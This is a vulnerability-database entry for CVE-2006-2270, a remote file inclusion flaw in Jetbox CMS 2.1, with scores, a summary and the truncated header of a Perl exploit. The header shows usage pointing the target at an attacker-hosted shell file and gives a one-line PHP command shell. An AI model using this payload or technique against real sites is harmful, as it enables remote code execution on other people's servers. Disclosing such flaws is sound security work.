7.5
CVSSv2

CVE-2006-2270

Published: 09/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in includes/config.php in Jetbox CMS 2.1 allows remote malicious users to execute arbitrary code via a URL in the relative_script_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

jetbox jetbox cms 2.1

Exploits

#!/usr/bin/perl ############ # JetBox CMS Remote File Include # Exploit & Advisorie: beford <xbefordx gmail com> # # uso:# perl ownpl <host> <cmd-shell-url> <cmd-var> # perl ownpl hostcom/jet/ atacante/shellgif cmd # # cmd shell example: <? system($cmd); ?> # cmd variable: cmd; # ############# ...